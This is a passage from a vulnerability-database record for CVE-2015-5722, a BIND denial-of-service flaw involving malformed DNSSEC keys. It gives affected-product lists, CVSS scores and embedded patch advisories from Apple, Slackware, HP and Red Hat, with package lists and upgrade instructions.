"9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x5.0.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x4.1.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x3.2.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x3.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x3.1.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.2.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.2.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.2.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x4.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x4.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x3.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x3.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x2.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "5.0.4" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "5.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "5.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.2" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.14" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "netezza host management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.10.0" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.18" }, { "model": "hp-ux c.9.7.3.8.0", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p25", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x5.0.15" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "5.2" } ], "sources": [ { "db": "BID", "id": "76605" }, { "db": "CNNVD", "id": "CNNVD-201509-057" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:isc:bind:*:p2:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.9.7", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:isc:bind:*:p3:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.10.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:5.0.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-5722" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Hanno B\u0026amp;amp;amp;amp;amp;amp;amp;ouml;ck from the Fuzzing Project", "sources": [ { "db": "BID", "id": "76605" } ], "trust": 0.3 }, "cve": "CVE-2015-5722", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-83683", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-5722", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-5722", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201509-057", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-83683", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2015-5722", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-83683" }, { "db": "VULMON", "id": "CVE-2015-5722" }, { "db": "CNNVD", "id": "CNNVD-201509-057" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer.c in named in ISC BIND 9.x before 9.9.7-P3 and 9.10.x before 9.10.2-P4 allows remote attackers to cause a denial of service (assertion failure and daemon exit) by creating a zone containing a malformed DNSSEC key and issuing a query for a name in that zone. ISC BIND is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to crash the affected application, denying service to legitimate users. ISC BIND is a set of open source software that implements the DNS protocol maintained by the Internet Systems Consortium (ISC) company in the United States. A security vulnerability exists in the buffer.c file in named in versions 9.x prior to ISC BIND 9.9.7-P3 and 9.10.x prior to 9.10.2-P4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2015-10-21-8 OS X Server 5.0.15\n\nOS X Server 5.0.15 is now available and addresses the following:\n\nBIND\nAvailable for: OS X Yosemite 10.10.5,\nOS X El Capitan 10.11.1 or later\nImpact: Multiple vulnerabilities in BIND\nDescription: Multiple vulnerabilities existed in BIND versions prior\nto 9.9.7-P3, one of which may have allowed a remote attacker to cause\na denial of service. These issues were addressed by updating BIND to\nversion 9.9.7-P3. \nCVE-ID\nCVE-2015-5722 : Hanno B\u00f6ck from the Fuzzing Project\nCVE-2015-5986\n\nWeb Service\nAvailable for: OS X Yosemite 10.10.5,\nOS X El Capitan 10.11.1 or later\nImpact: A remote attacker may be able to bypass access restrictions\nDescription: An HTTP header field reference was missing from the\nconfiguration files. This issue was addressed by adding the HTTP\nheader field reference to the configuration file. \nCVE-ID\nCVE-2015-7031 : an anonymous researcher\n\nInstallation note:\n\nOS X Server 5.0.15 may be obtained from the Mac App Store. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/bind-9.9.7_P3-i486-1_slack14.1.txz: Upgraded. \n This update fixes two denial-of-service vulnerabilities:\n + CVE-2015-5722 is a denial-of-service vector which can be\n exploited remotely against a BIND server that is performing\n validation on DNSSEC-signed records. Validating recursive\n resolvers are at the greatest risk from this defect, but it has not\n been ruled out that it could be exploited against an\n authoritative-only nameserver under limited conditions. Servers\n that are not performing validation are not vulnerable. However,\n ISC does not recommend disabling validation as a workaround to\n this issue as it exposes the server to other types of attacks. \n Upgrading to the patched versions is the recommended solution. \n All versions of BIND since 9.0.0 are vulnerable to CVE-2015-5722. Validation\n is not required. Recursive resolvers are at the greatest risk\n from this defect, but it has not been ruled out that it could\n be exploited against an authoritative-only nameserver under\n limited conditions. \n Only versions of BIND since 9.9.7 and 9.10.2 are vulnerable to\n CVE-2015-5986. \n For more information, see:\n https://kb.isc.org/article/AA-01287/0\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722\n https://kb.isc.org/article/AA-01291/0\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5986\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.7_P3-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.7_P3-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.7_P3-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.7_P3-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.7_P3-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.7_P3-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.7_P3-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.7_P3-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2_P4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2_P4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n627f6c6827eca24776d790166801de25 bind-9.9.7_P3-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n49082f50322af84efe8d91459599b837 bind-9.9.7_P3-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n4dd375df46e84dbecb9f296e2fec692a bind-9.9.7_P3-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n90b4376b145544d9a63c28dcb891ca47 bind-9.9.7_P3-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n181ce9e11eb9d909c5c06b8ddd5bb1b5 bind-9.9.7_P3-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n368f7a3b977865b0132bdcd129e70813 bind-9.9.7_P3-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bb80a54fb5d0f76d17ef33cf06a074d bind-9.9.7_P3-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd77b36e48e2c033ffa9d99816979304f bind-9.9.7_P3-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nada9c70208885b4c7904364e040360f9 bind-9.9.7_P3-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\na78fbe27ba2834d2918fa26ce96d5083 bind-9.9.7_P3-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n450614c08d5fac56c8d2701394d1af50 n/bind-9.10.2_P4-i586-1.txz\n\nSlackware x86_64 -current package:\n32e680d6bce8dac3ad5ba54958f68f95 n/bind-9.10.2_P4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg bind-9.9.7_P3-i486-1_slack14.1.txz\n\nThen, restart the name server:\n\n# /etc/rc.d/rc.bind restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nRelease Date: 2015-09-21\nLast Updated: 2015-09-21\n\nPotential Security Impact: Remote denial of service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified in the HP-UX BIND\nservice running named. This vulnerability could be exploited remotely to\ncreate a Denial of Service (DoS). \n\nReferences:\n\nCVE-2015-5722\nCVE-2015-5477\nSSRT102248\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.31 BIND 9.7.3 prior to C.9.7.3.8.0 (named)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5722 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2015-5477 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following software update to resolve the vulnerability in\nthe HP-UX BIND service running named. \n\nBIND 9.7.3 for HP-UX Release\n Depot Name\n Download location\n\nB.11.31 (PA and IA)\n HP_UX_11.31_HPUX-NameServer_C.9.7.3.8.0_HP-UX_B.11.31_IA_PA.depot\n https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe\nr=BIND\n\nMANUAL ACTIONS: Yes - Update\nDownload and install the software update\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNameService.BIND-AUX\nNameService.BIND-RUN\naction: install revision C.9.7.3.8.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 21 September 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: bind security update\nAdvisory ID: RHSA-2015:1705-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1705.html\nIssue date: 2015-09-03\nCVE Names: CVE-2015-5722 \n=====================================================================\n\n1. Summary:\n\nUpdated bind packages that fix one security issue are now available for Red\nHat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly. \n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. (CVE-2015-5722)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Hanno B\u00f6ck as the original reporter. \n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1259087 - CVE-2015-5722 bind: malformed DNSSEC key failed assertion denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.4.src.rpm\n\ni386:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nbind-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.4.src.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.4.src.rpm\n\ni386:\nbind-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nppc64:\nbind-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.ppc.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\n\ns390x:\nbind-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.s390.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 